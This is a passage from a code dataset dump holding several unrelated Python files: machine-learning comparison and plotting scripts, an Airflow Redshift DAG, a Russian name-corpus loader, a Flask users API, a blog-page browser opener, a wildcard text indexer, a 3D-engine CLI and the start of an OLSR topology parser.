SVC\n\n# load dataset\nfrom model_evaluator import get_gain\nfrom tools.data_concat_files import *\n\n# data = get_fdax_es_eurusd(\"AG_NO_OPT_STRONG\",\"AG_5\")\n\n# data = get_concatenated_files()\n\n# Drop DAX column\n# cols = [0,2,3,4,5,6,7]\n# cols = [3,4,5,6,7]\n# cols = [0, 1, 3, 4, 5, 7]\n# cols = [0, 1,2, 3, 4, 5, 6, 7]\n# data = data.iloc[:, list(cols)]\n\ndata = get_short_data_fdax_shifted()\ndata = get_short_data()\n# data = get_concatenated_files()\n\n\nprint(data.head())\n\nif 'Profit' in data.columns : data.drop('Profit',axis=1,inplace = True)\n\nY = data['Success']\nX = data.drop('Success',axis=1)\n\n\n# prepare configuration for cross validation test harness\nseed = random.randint(0, 100)\n# prepare models\nmodels = []\nmodels.append(('LR', LogisticRegression()))\nmodels.append(('LDA', LinearDiscriminantAnalysis()))\nmodels.append(('KNN', KNeighborsClassifier()))\nmodels.append(('CART', DecisionTreeClassifier()))\nmodels.append(('NB', GaussianNB()))\nmodels.append(('SVM', SVC()))\nmodels.append(('RFC', RandomForestClassifier()))\nmodels.append(('MLPC', MLPClassifier()))\n\n\ndtc = DecisionTreeClassifier()\nlda = LinearDiscriminantAnalysis()\nrfc = RandomForestClassifier()\nknc = KNeighborsClassifier()\nmlpc = MLPClassifier()\nmodels.append(('VC', VotingClassifier(estimators=[\n    ('lda', lda),\n    ('knc', knc),\n    ('mlpc', mlpc)\n], voting='soft')))\n\n# evaluate each model in turn\nresults = []\nnames = []\nscoring = 'accuracy'\nfor name, model in models:\n    kfold = model_selection.KFold(n_splits=10, random_state=seed)\n    # cv_results = model_selection.cross_val_score(model, X, Y, cv=kfold, scoring=scoring)\n\n    my_scorer = make_scorer(get_gain, greater_is_better=True)\n    cv_results = model_selection.cross_val_score(model, X, Y, cv=kfold, scoring=my_scorer)\n\n    results.append(cv_results)\n    names.append(name)\n    msg = \"%s: %f (%f)\" % (name, cv_results.mean(), cv_results.std())\n    print(msg)\n# boxplot algorithm comparison\nfig = plt.figure()\nfig.suptitle('Algorithm Comparison')\nax = fig.add_subplot(111)\nplt.boxplot(results)\nax.set_xticklabels(names)\nplt.show()\n","sub_path":"tools/classifier_comparison.py","file_name":"classifier_comparison.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"104258830","text":"\"\"\"\nCreated on Tue Apr 25 11:46:31 2017\n\n@author: lansford\n\"\"\"\n\nfrom __future__ import division\nimport os\nimport pickle\nfrom timeit import default_timer as timer\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.neural_network import MLPRegressor\nfrom ir_gen import IR_GEN\n\"\"\"loading model files\"\"\"\npickleLoc = os.path.expanduser('~/Box Sync/Synced_Files/Coding/Research/IR_project/Data/COsite_NN.pkl')\ninfile = open(pickleLoc,'rb')\nCOsite_NN = pickle.load(infile) #encoding = 'latin1' if python3\ninfile.close()\nspectrum = np.linspace(200,2200,num=501,endpoint=True)\n\n\"\"\"loading Spectrum files\"\"\"\nSingleCOLoc = os.path.expanduser('~/Documents/VASP/Testing IR/Vibration_Lists/old/SingleCO_200plus.pkl')\ninfile = open(SingleCOLoc, 'rb')\nSingleCO = pickle.load(infile) #encoding = 'latin1' if python3\ninfile.close()\n\nLoadIndex = os.path.expanduser('~/Documents/VASP/Testing IR/Vibration_Lists/old/CNCOtrain_test_all_200plus.pkl')\ninfile = open(LoadIndex, 'rb')\nLoadIndex = pickle.load(infile) #encoding = 'latin1' if python3\ninfile.close()\n\nfor i in SingleCO:\n    if i[0].CNCO == 5 or i[0].CNCO == 0:\n        i[0].CNCO = 
4\nCNCOList = [i[0].CNCO for i in SingleCO]\nCNCOList = np.array(CNCOList)\nXfreq = np.array([np.real(i[0].frequencies) for i in SingleCO])\nXint = np.array([i[0].intensities for i in SingleCO])\nX = np.array([np.array((Xfreq[i], Xint[i])) for i in range(len(SingleCO))])\ny = CNCOList\nCNconv = IR_GEN(4)\nprobabilities = CNconv.get_probabilities((11, 6, 3))\nXconv_test, yconv_test = CNconv.get_xyconv(X[LoadIndex[1]], y[LoadIndex[1]], probabilities)\n\nspectrum = np.linspace(200,2200,num=501,endpoint=True)\n\nXconv_plot = [Xconv_test[i] for i in range(len(probabilities)) if min(probabilities[i])>0.05][3]\nyconv_plot = [yconv_test[i] for i in range(len(probabilities)) if min(probabilities[i])>0.05][3]\nyplotpredict = COsite_NN.predict(Xconv_plot.reshape(1,-1))[0]\nimport matplotlib.pyplot as plt\nplt.figure(5,figsize=(9,5))\nplt.plot(spectrum,Xconv_plot,lw=3)\nplt.xlabel('Frequency [cm$^{-1}$]',size=20)\nplt.ylabel('Relative Intensity',size=20)\nplt.xlim([200,2200])\nplt.tick_params(axis='both', which='major', labelsize=16)\nplt.gcf().subplots_adjust(bottom=0.14)\nplt.gcf().subplots_adjust(top=0.99)\nplt.gcf().subplots_adjust(left=0.10)\nplt.gcf().subplots_adjust(right=0.99)\nprint(yconv_plot)\nprint(yplotpredict)","sub_path":"Generate_Figures.py","file_name":"Generate_Figures.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"15452703","text":"from datetime import datetime, timedelta\nimport os\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.hooks.postgres_hook import PostgresHook\nfrom operators import (StageToRedshiftOperator, LoadFactOperator,\n LoadDimensionOperator, RowCountOperator, NullPercentOperator, PostGresOperator)\nfrom helpers import SqlQueries\n#AWS_KEY = os.environ.get('AWS_KEY')\n#AWS_SECRET = os.environ.get('AWS_SECRET')\n\ndefault_args = {\n 'owner': 'rohan',\n 'start_date': datetime(2020, 1, 1),\n 'end_date': datetime(2020, 2, 1),\n 'depends_on_past': False,\n 'retries': 3,\n 'retry_delay': timedelta(minutes=2),\n 'catchup': True,\n 'email_on_retry': False\n}\n\ndag = DAG('udac_example_dag',\n default_args=default_args,\n description='Load and transform data in Redshift with Airflow',\n schedule_interval='@daily',\n max_active_runs=1\n )\n\nstart_operator = DummyOperator(task_id='Begin_execution', dag=dag)\n\nstage_blocks_to_redshift = StageToRedshiftOperator(\n task_id='Stage_blocks',\n dag=dag,\n table='staging_blocks',\n redshift_conn_id=\"redshift_id\",\n aws_credentials_id=\"aws_credentials\",\n s3_bucket=\"rk-blockchain-db\",\n s3_key=\"block\",\n ftype='CSV',\n region='us-east-1',\n backfill_execution_date=True\n)\n\nstage_transaction_to_redshift = StageToRedshiftOperator(\n task_id='Stage_transactions',\n dag=dag,\n table='staging_transactions',\n redshift_conn_id=\"redshift_id\",\n aws_credentials_id=\"aws_credentials\",\n s3_bucket=\"rk-blockchain-db\",\n s3_key=\"transaction\",\n ftype='CSV',\n region='us-east-1',\n backfill_execution_date=True\n)\n\nstage_prices_to_redshift = StageToRedshiftOperator(\n task_id='Stage_prices',\n dag=dag,\n table='staging_prices',\n redshift_conn_id=\"redshift_id\",\n aws_credentials_id=\"aws_credentials\",\n s3_bucket=\"rk-blockchain-db\",\n s3_key=\"price\",\n ftype='JSON',\n ignore_headers=0,\n region='us-east-1',\n backfill_execution_date=True\n)\n\n\nload_block_transaction_table = LoadFactOperator(\n task_id='Load_block_transaction_fact_table',\n dag=dag,\n 
redshift_conn_id='redshift_id',\n sql_query=SqlQueries.block_transaction_table_insert\n)\n\nload_block_dimension_table = LoadDimensionOperator(\n task_id='Load_block_dim_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n table=\"block\",\n sql_query=SqlQueries.block_table_insert\n)\n\nload_transaction_dimension_table = LoadDimensionOperator(\n task_id='Load_transaction_dim_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n table=\"transactions\",\n sql_query=SqlQueries.transaction_table_insert\n)\n\nload_price_dimension_table = LoadDimensionOperator(\n task_id='Load_price_dim_table',\n dag=dag,\n redshift_conn_id='redshift_id',\n table=\"price\",\n sql_query=SqlQueries.price_table_insert\n)\n\nrun_quality_checks_row_count = RowCountOperator(\n task_id='Run_data_quality_checks_row_cnt',\n dag=dag,\n redshift_conn_id='redshift_id',\n tables=[\"transactions\", \"block\", \"block_transaction\", \"price\"]\n)\n\nrun_quality_checks_null_per = NullPercentOperator(\n task_id='Run_data_quality_checks_null_per',\n dag=dag,\n redshift_conn_id='redshift_id',\n tables=[ \"block_transaction\"]\n)\n\nend_operator = DummyOperator(task_id='Stop_execution', dag=dag)\n\nstart_operator>> stage_blocks_to_redshift\nstart_operator>> stage_transaction_to_redshift\nstart_operator>> stage_prices_to_redshift\n\n[stage_blocks_to_redshift, stage_transaction_to_redshift, stage_prices_to_redshift] >> load_block_transaction_table\n\nload_block_transaction_table >> load_transaction_dimension_table\nload_block_transaction_table >> load_block_dimension_table\nload_block_transaction_table >> load_price_dimension_table\n\nload_transaction_dimension_table >> run_quality_checks_row_count\nload_block_dimension_table >> run_quality_checks_row_count\nload_price_dimension_table >> run_quality_checks_row_count\n\nrun_quality_checks_row_count >> run_quality_checks_null_per >> end_operator\n\n\n\n\n\n\n","sub_path":"airflow/dags/udac_example_dag.py","file_name":"udac_example_dag.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"457455247","text":"import os\nimport re\nimport json\nfrom collections import Counter, OrderedDict\n\nfrom tqdm import tqdm_notebook as log_progress\n\nfrom natasha.utils import Record\nfrom natasha import NamesExtractor\nfrom natasha.markup import show_markup\n\n\nFACTRU_DIR = 'factRuEval-2016'\nDEVSET_DIR = os.path.join(FACTRU_DIR, 'devset')\nTESTSET_DIR = os.path.join(FACTRU_DIR, 'testset')\n\n\nclass Span(Record):\n __attributes__ = ['id', 'type', 'start', 'stop']\n\n def __init__(self, id, type, start, stop):\n self.id = id\n self.type = type\n self.start = start\n self.stop = stop\n\n\nclass Entity(Record):\n __attributes__ = ['id', 'type', 'spans']\n\n def __init__(self, id, type, spans):\n self.id = id\n self.type = type\n self.spans = spans\n\n\nclass Coref(Record):\n __attributes__ = ['id', 'entities', 'normalized']\n\n def __init__(self, id, entities, normalized):\n self.id = id\n self.entities = entities\n self.normalized = normalized\n\n\nclass Token(Record):\n __attributes__ = ['value', 'start', 'stop']\n\n def __init__(self, value, start, stop):\n self.value = value\n self.start = start\n self.stop = stop\n\n @property\n def as_json(self):\n return [self.value, self.start, self.stop]\n\n @property\n def span(self):\n return self.start, self.stop\n\n def shifted(self, shift):\n return Token(\n self.value,\n self.start + shift,\n self.stop + shift\n )\n\n\nclass Name(Record):\n __attributes__ 
= ['first', 'middle', 'last', 'nick']\n\n def __init__(self, first, middle, last, nick):\n self.first = first\n self.middle = middle\n self.last = last\n self.nick = nick\n\n @property\n def as_json(self):\n data = OrderedDict()\n for key in self.__attributes__:\n value = getattr(self, key)\n if value is not None:\n data[key] = value.as_json\n return data\n\n @property\n def span(self):\n starts = []\n stops = []\n for token in self:\n if token:\n starts.append(token.start)\n stops.append(token.stop)\n return min(starts), max(stops)\n\n def shifted(self, shift):\n tokens = [\n (_.shifted(shift) if _ else _)\n for _ in self\n ]\n return Name(*tokens)\n\n\nclass NamePart(Record):\n __attributes__ = ['type', 'token']\n\n def __init__(self, type, token):\n self.type = type\n self.token = token\n\n\nclass ComplexName(Record):\n __attributes__ = ['parts']\n\n def __init__(self, parts):\n self.parts = parts\n\n\nclass CoreferenceGroup(Record):\n __attributes__ = ['normalized', 'items']\n\n def __init__(self, normalized, items):\n self.normalized = normalized\n self.items = items\n\n\nclass Test(Record):\n __attributes__ = ['text', 'names']\n\n def __init__(self, text, names):\n self.text = text\n self.names = names\n\n\ndef load_text(path):\n with open(path) as file:\n return file.read()\n\n\ndef load_factru_doc(id, extension):\n for dir in [DEVSET_DIR, TESTSET_DIR]:\n filename = 'book_{id}.{extension}'.format(\n id=id,\n extension=extension\n )\n path = os.path.join(dir, filename)\n if os.path.exists(path):\n return load_text(path)\n\n\ndef load_factru_text(id):\n return load_factru_doc(id, 'txt')\n\n\ndef list_factru_ids(dir=None):\n if dir is None:\n dirs = [DEVSET_DIR, TESTSET_DIR]\n else:\n dirs = [dir]\n for dir in dirs:\n for filename in os.listdir(dir):\n match = re.match('book_(\\d+)\\.txt', filename)\n if match:\n id = int(match.group(1))\n yield id\n\n\n# [('loc_name', 2434),\n# ('org_name', 2265),\n# ('surname', 1959),\n# ('org_descr', 1684),\n# ('job', 1386),\n# ('name', 1341),\n# ('loc_descr', 321),\n# ('geo_adj', 220),\n# ('nickname', 68),\n# ('patronymic', 42),\n# ('prj_name', 22),\n# ('prj_descr', 10),\n# ('facility_descr', 2)]\n\n\ndef parse_factru_spans(text):\n for line in text.splitlines():\n match = re.match('^(\\d+) ([^ ]+) (\\d+) (\\d+)[^$]+$', line)\n id, type, start, size = match.groups()\n id = int(id)\n start = int(start)\n size = int(size)\n yield Span(id, type, start, start + size)\n\n\ndef load_factru_spans(id):\n text = load_factru_doc(id, 'spans')\n return parse_factru_spans(text)\n\n\n# [('Org', 2821),\n# ('Person', 2129),\n# ('LocOrg', 1399),\n# ('Location', 1257),\n# ('Project', 22),\n# ('Facility', 2)]\n\n\ndef parse_factru_entities(text):\n for line in text.splitlines():\n match = re.match('^(\\d+) ([^ ]+) ([\\d ]+)[^$]+$', line)\n id, type, spans = match.groups()\n id = int(id)\n spans = [int(_) for _ in spans.split()]\n yield Entity(id, type, spans)\n\n\ndef load_factru_entities(id):\n text = load_factru_doc(id, 'objects')\n return parse_factru_entities(text)\n\n\ndef parse_factru_corefs(text):\n id = None\n entities = None\n normalized = {}\n for line in text.splitlines():\n if not line:\n yield Coref(id, entities, normalized)\n id = None\n entities = None\n normalized = {}\n else:\n match = re.match('^(\\d+) ([\\d ]+)$', line)\n if match:\n id, entities = match.groups()\n id = int(id)\n entities = [int(_) for _ in entities.split()]\n else:\n key, value = line.split(' ', 1)\n normalized[key] = value\n\n\ndef load_factru_corefs(id):\n text = 
load_factru_doc(id, 'coref')\n return parse_factru_corefs(text)\n\n\ndef span_token(text, span):\n start = span.start\n stop = span.stop\n value = text[start:stop]\n return Token(value, start, stop)\n\n\ndef prepare_name_part(text, span):\n type = span.type\n token = span_token(text, span)\n return NamePart(type, token)\n\n\ndef prepare_name(text, spans):\n counts = Counter(_.type for _ in spans)\n assert set(counts.keys()) <= {'name', 'patronymic', 'surname', 'nickname'}\n if all(_ == 1 for _ in counts.values()):\n mapping = {\n _.type: span_token(text, _)\n for _ in spans\n }\n return Name(\n mapping.get('name'),\n mapping.get('patronymic'),\n mapping.get('surname'),\n mapping.get('nickname')\n )\n else:\n parts = [prepare_name_part(text, _) for _ in spans]\n return ComplexName(parts)\n\n\ndef prepare_entity(id, text, id_entities, id_spans):\n entity = id_entities[id]\n spans = [id_spans[_] for _ in entity.spans]\n if entity.type == 'Person':\n return prepare_name(text, spans)\n\n\ndef prepare_normalized_name(data):\n if set(data) <= {\n 'firstname',\n 'lastname',\n 'wikidata',\n 'patronymic',\n 'nickname'\n }:\n return Name(\n data.get('firstname'),\n data.get('patronymic'),\n data.get('lastname'),\n data.get('nickname')\n )\n else:\n parts = [\n NamePart(_, data[_])\n for _ in data\n ]\n return ComplexName(parts)\n\n\ndef load_factru(id):\n text = load_factru_text(id)\n spans = list(load_factru_spans(id))\n corefs = list(load_factru_corefs(id))\n entities = list(load_factru_entities(id))\n id_spans = {_.id: _ for _ in spans}\n id_entities = {_.id: _ for _ in entities}\n for coref in corefs:\n normalized = prepare_normalized_name(coref.normalized)\n items = [\n prepare_entity(_, text, id_entities, id_spans)\n for _ in coref.entities\n ]\n if all(items):\n yield CoreferenceGroup(normalized, items)\n\n\ndef dump_json(data, path):\n with open(path, 'w') as file:\n dump = json.dumps(data, ensure_ascii=False, indent=4)\n file.write(dump)\n\n\ndef get_line_tokens(text):\n for match in re.finditer('([^\\n]+)', text):\n value = match.group(1)\n start = match.start()\n stop = match.end()\n yield Token(value, start, stop)\n\n\ndef is_inside(a, b):\n a_start, a_stop = a\n b_start, b_stop = b\n return a_start >= b_start and a_stop <= b_stop\n\n\ndef split_test(test):\n text, names = test\n for line in get_line_tokens(text):\n items = []\n for name in names:\n if is_inside(name.span, line.span):\n items.append(name.shifted(-line.start))\n yield Test(line.value, items)\n","sub_path":"natasha/tests/name/factRuEval/generate/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"136750772","text":"#!/usr/bin/python3\n\"\"\"User page for flask that displays class user.\"\"\"\nfrom api.v1.views import app_views\nfrom flask import jsonify, abort, request, make_response\nfrom models import storage\nfrom models.user import User\n\n\n@app_views.route(\"/users\", methods=['GET'], strict_slashes=False)\ndef get_all_users():\n \"\"\" This function retrieves all users. Has no parameters. 
\"\"\"\n users_dict = []\n all_object_dict = storage.all(User).values()\n for value in all_object_dict:\n users_dict.append(value.to_dict())\n return jsonify(users_dict)\n\n\n@app_views.route(\"/users/\", methods=['GET'],\n strict_slashes=False)\ndef get_id_user(user_id):\n \"\"\" This function retrieves one user given an id.\n user_id → Id of the requested User.\n \"\"\"\n object_dict = storage.get(\"User\", user_id)\n if object_dict:\n return jsonify(object_dict.to_dict())\n abort(404)\n\n\n@app_views.route(\"/users/\", methods=['DELETE'],\n strict_slashes=False)\ndef delete_an_user(user_id):\n \"\"\" This function retrieves one user given an id and\n deletes it.\n user_id → Id of user to delete.\n returns an empty dictionary on success.\n raises a 404 error if user doesn't exists.\n \"\"\"\n object_dict = storage.get(\"User\", user_id)\n if object_dict:\n object_dict.delete()\n storage.save()\n return make_response(jsonify({}), 200)\n abort(404)\n\n\n@app_views.route(\"/users/\", methods=['POST'], strict_slashes=False)\ndef create_user():\n \"\"\" This function creates a new user. \"\"\"\n new_user = request.get_json()\n if not new_user:\n abort(400, \"Not a JSON\")\n\n if not new_user.get(\"email\"):\n abort(400, \"Missing email\")\n\n if not new_user.get(\"password\"):\n abort(400, \"Missing password\")\n\n user = User(**new_user)\n storage.new(user)\n storage.save()\n return make_response(jsonify(user.to_dict()), 201)\n\n\n@app_views.route(\"/users/\", methods=['PUT'],\n strict_slashes=False)\ndef update_user(user_id):\n \"\"\" This function updates a user. \"\"\"\n user_update = request.get_json()\n if not user_update:\n abort(400, \"Not a JSON\")\n\n object_ = storage.get(\"User\", user_id)\n if object_:\n ignored_attr = [\"id\", \"created_at\", \"updated_at\"]\n for key, value in user_update.items():\n if key not in ignored_attr:\n setattr(object_, key, value)\n\n object_.save()\n storage.save()\n return make_response(jsonify(object_.to_dict()), 200)\n abort(404)\n","sub_path":"api/v1/views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":2577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"190427559","text":"import wave, struct\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pylab\n#import fft\nimport wavelet\n\n#-------------------------------------------------------------------------------\n# Read wave file and return both channels\n#-------------------------------------------------------------------------------\ndef read_wav(filename):\n wave_file = wave.open(filename, 'r')\n (nchannels, sampwidth, framerate, nframes, comptype, compname) = wave_file.getparams ()\n \n frames = wave_file.readframes(nframes * nchannels)\n # Convert from hexa to string\n out = struct.unpack_from (\"%dh\" % nframes * nchannels, frames)\n \n # Convert 2 channels to numpy arrays\n if nchannels == 2:\n left = np.array (list (out[0::2]))\n right = np.array (list (out[1::2]))\n else:\n left = np.array (out)\n right = left\n wave_file.close()\n return left,right,framerate\n\ndef simple_ex(fig):\n ax = fig.add_subplot(2, 1, 1)\n x = np.arange(0,10,np.exp2(-10))\n f = [np.sin(2*cur)+np.cos(3*cur) for cur in x]\n ax.plot(x,f)\n wavlt = wavelet.wvlt(f)\n c = wavlt.haar(1)\n cx = fig.add_subplot(2, 1, 2)\n cx.plot(c)\n\n#def comparison(fig):\n# ax = fig.add_subplot(3, 1, 1)\n# ax.plot(chan1)\n# \n# wavlt = wavelet.wvlt(chan1)\n# s,d = wavlt.haar(2)\n#\n# bx = fig.add_subplot(3, 1, 2)\n# #spectrogram = 
pylab.specgram(chan1, Fs = fps, scale_by_freq=True,sides='default')\n#    bx.plot(s)\n#    \n#    cx = fig.add_subplot(3, 1, 3)\n#    cx.plot(d)\n#    \n#    #c = np.fft.fft(chan1)\n#    #cx.plot(c[0:len(c)/100])\n \n\n#-------------------------------------------------------------------------------\n#-------------------------------------------------------------------------------\n\nchan1,chan2,fps = read_wav('piano1.wav')\n\n#simple_ex(fig)\n#comparison(fig)\nwavlt = wavelet.wvlt(chan1)\nwavlt.haar(7)\nwavlt.plot()\n","sub_path":"sound_recognition/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"190290921","text":"'''\r\nSimulate a browser visiting web pages\r\n'''\r\n#!/usr/bin/env python3\r\n#-*- coding: utf-8 -*-\r\n\r\nimport time\r\nimport webbrowser\r\nimport re\r\nimport os\r\nfrom urllib import request\r\nfrom urllib.parse import urljoin\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nURL_HOME = [('http://blog.csdn.net/windeal3203?viewmode=contents',\r\n             '<a[^>]+\"cate_menu_lk\" href=[\"\\'](.*?)[\"\\']'),\r\n            ('http://www.baidu.com', '<a[^>]+\"cate_menu_lk\" href=[\"\\'](.*?)[\"\\']')]\r\n\r\ndef access_url_list(url_list):\r\n    '''\r\n    Visit every url in url_list\r\n    '''\r\n    for index, url in enumerate(url_list):\r\n        if index % 5 == 0:\r\n            os.system(\"killall firefox\")\r\n            time.sleep(3)\r\n        print('test %s' % url)\r\n        webbrowser.open(url, new=0)\r\n        time.sleep(3)\r\n\r\ndef scrap_url_list(url, url_regex):\r\n    '''\r\n    Fetch at most 20 urls from the page at url,\r\n    return a list of urls\r\n    '''\r\n    link_regex = re.compile(url_regex)\r\n    req = request.urlopen(url)\r\n    html = req.read().decode('utf-8')\r\n    links = link_regex.findall(str(html))\r\n    for index, link in enumerate(links):\r\n        links[index] = urljoin(url, link)\r\n    if len(links) > 6:\r\n        links = links[0:6]\r\n    return links\r\n\r\ndef get_article_links(url):\r\n    '''\r\n    Get the links of all articles in this page's article list\r\n    '''\r\n    links = []\r\n    req = request.urlopen(url)\r\n    html = req.read().decode('utf-8')\r\n    soup = BeautifulSoup(html, \"html.parser\")\r\n    title_span_all = soup.find_all(\"span\", class_='link_title')\r\n    for title_span in title_span_all:\r\n        link = title_span.find_next(\"a\").get(\"href\")\r\n        link = urljoin(url, link)\r\n        links.append(link)\r\n    return links\r\n\r\ndef main():\r\n    ''' main()\r\n    '''\r\n    links = get_article_links(URL_HOME[0][0])\r\n#    links = scrap_url_list(URL_HOME[0][0], URL_HOME[0][1])\r\n    print(links)\r\n    access_url_list(links)\r\n    time.sleep(5)\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","sub_path":"python/tools/access_web.py","file_name":"access_web.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"276474383","text":"import re\nimport string\nfrom stemming.porter import stem\n\nSTOPWORDS = ['i', 'a', 'about', 'an', 'are', 'as', 'at', 'be', 'by', 'com', 'for', 'from', 'how', 'in', 'is', 'it', 'of', 'on', 'or', 'that', 'the', 'this', 'to', 'was', 'what', 'when', 'where', 'who', 'will', 'with', 'the']\n\ndef contruct_index():\n    index = {}\n    with open('the new testament.txt', 'r') as f:\n        doc_id = 0\n        prev_chapter = ''\n        for line in f.readlines():\n            if line != '\\n':\n                split_line = line.split()\n                first_word = split_line[0]\n                if is_chapter_verse(first_word):\n                    chapter = first_word.split(':')[0]\n                    # If a new chapter starts, change the doc_id\n                    if chapter != prev_chapter:\n                        doc_id += 1\n                        prev_chapter = chapter\n                    words = split_line[1:]\n                else:\n                    words = split_line\n                for word in words:\n                    if not 
is_chapter_verse(word):\n                        token = tokenize(word)\n                        if token not in STOPWORDS:\n                            term = stem(token)\n                            if term in index:\n                                index[term].append(doc_id)\n                            else:\n                                index[term] = [doc_id]\n    return index\n\ndef tokenize(word):\n    transtable = str.maketrans('', '', string.punctuation)\n    token = word.translate(transtable).lower()\n    return token\n\ndef is_chapter_verse(word):\n    if re.match('[0-9]+:[0-9]+', word):\n        return True\n    return False\n    \n    \n    \n# PERMUTERM SECTION:\n#-Diego-\ndef get_permuterminos(word):\n    res = []\n    word+=\"$\"\n    for i in range(len(word)):\n        temp = word[i:len(word)]+word[0:i]\n        res.append(temp)\n    return res\n\ndef get_word(permutermino):\n    pos = permutermino.find(\"$\")\n    if(pos != -1):\n        return permutermino[pos+1:len(permutermino)] + permutermino[0:pos]\n    else:\n        return permutermino\n    \ndef create_index_permuterminos(index):\n    res = []\n    for palabra in index:\n        permuterminos = get_permuterminos(palabra)\n        for perm in permuterminos:\n            res.append(perm)\n    return res\n\ndef find_by_permutermino(permindex,word):\n    word = word.lower()\n    res = []\n\n    # CASE X\n    if re.match(\"^[a-z]+$\",word):\n        for p in permindex:\n            if (p.find(word+\"$\") == 0):\n                if (p[len(p)-1] == \"$\"):\n                    res.append(get_word(p))\n\n    \n    # CASE X*\n    if re.match(\"^[a-z]+\\\\*$\",word):\n        for p in permindex:\n            if (p.find(\"$\"+word[0:len(word)-1]) == 0):\n                res.append(get_word(p))\n\n    # CASE *X\n    if re.match(\"^\\\\*[a-z]+$\",word):\n        for p in permindex:\n            if (p.find(word[1:len(word)]+\"$\") == 0):\n                res.append(get_word(p))\n    \n    # CASE *X*\n    if re.match(\"^\\\\*[a-z]+\\\\*$\",word):\n        for p in permindex:\n            if (p.find(word[1:len(word)-1]) == 0):\n                res.append(get_word(p)) \n    \n    # CASE X*Y\n    if re.match(\"^[a-z]+\\\\*[a-z]+$\",word):\n        for p in permindex:\n            pos = word.find(\"*\")\n            if (p.find(word[pos+1:len(word)]+\"$\"+word[0:pos]) == 0):\n                res.append(get_word(p))\n    \n    return res\n","sub_path":"indexer.py","file_name":"indexer.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"532217606","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/dauptain/GITLAB/tiny_3d_engine/src/tiny_3d_engine/cli.py\n# Compiled at: 2020-04-23 02:22:19\n# Size of source mod 2**32: 2506 bytes\n\"\"\" command line of Tiny 3D engine\"\"\"\nimport click\nfrom tiny_3d_engine.examples.geoload import spawngeo\nfrom tiny_3d_engine.examples.rabbit import spawnrabbit\nfrom tiny_3d_engine.examples.benchmark import benchmark\n\n@click.group()\ndef main_cli():\n    \"\"\"--------------- TINY_3D_ENGINE --------------------\n\nYou are now using the Command line interface of Tiny 3D engine,\na Python3 Tkinter lightweight 3D engine, created at CERFACS (https://cerfacs.fr).\n\nThis package is meant to be used as a dependency of other packages,\nto provide a light 3D feedback for small 3D scenes <100 000 polygons.\nThis CLI is given here for developers' perusal and demonstrations.\nFind the script of these small tools in the /examples folder of the package.\n\nThis is a python package currently installed in your python environment.\nSee the full documentation at : https://tiny-3d-engine.readthedocs.io/en/latest/.\n\nDISCLAIMER: Tiny 3D engine is a brute force flat renderer.\nAs it is NOT using your graphics card, \ndo not expect anything fancier than a 1980 video game.\n\n\"\"\"\n    pass\n\n\n@click.command()\n@click.argument('filename', nargs=1)\ndef 
load(filename):\n \"\"\"Load a 3D scene from FILENAME.\n\n Currently ENSIGHT .geo files are supported,\n with elements bar2, tri3, quad4\n as well as .ply files , for triangles only.\n \"\"\"\n spawngeo(filename)\n\n\nmain_cli.add_command(load)\n\n@click.command()\ndef bench():\n \"\"\"Run a short benchmark on your machine.\n \n The bench tests an increasing amount of elements bar2, tri3 and quad3, \n until the final rendering time is over .1 second.\n \"\"\"\n benchmark()\n\n\nmain_cli.add_command(bench)\n\n@click.command()\n@click.option('--shading',\n type=click.Choice([\n 'none', 'linear', 'radial', 'flat'],\n case_sensitive=False),\n default='flat')\n@click.option('--version',\n type=(click.Choice([\n '4', '3', '2'])),\n default='4',\n help='Coarse resolution (4) to mild resolution (2).')\ndef rabbit(shading, version):\n \"\"\"Run a demo with the Stanford Rabbit.\n \n (| (|\n\n ( -.-)\n\n o_(\")(\")\n\n SHADING flag will control the shading applied.\n\n VERSION: Three Standord rabbit versions are included:\n\n 4 coarse resolution - 948 faces\n\n 3 low resolution - 3851 faces\n\n 2 mild resolution - 16301 faces\n\n the higest resolution circa 70000 faces was not included\n to keep the repository light enough.\n\n \"\"\"\n spawnrabbit(shading, version)\n\n\nmain_cli.add_command(rabbit)","sub_path":"pycfiles/tiny_3d_engine-0.2.0-py3-none-any/cli.cpython-36.py","file_name":"cli.cpython-36.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246540861","text":"import networkx\n\nfrom .base import BaseParser\nfrom ..exceptions import NetParserException\n\n\nclass OlsrParser(BaseParser):\n \"\"\" OLSR 0.6.x parser \"\"\"\n protocol = 'OLSR'\n version = '0.6'\n metric = 'ETX'\n\n def parse(self, data):\n \"\"\"\n Converts a dict representing an OLSR 0.6.x topology in a NetworkX Graph object.\n \"\"\"\n graph = networkx.Graph()\n if 'topology' not in data:\n raise NetParserException('Parse error, \"topology\" key not found')\n # loop over topology section and create networkx graph\n for link in data[\"topology\"]:\n try:\n source = 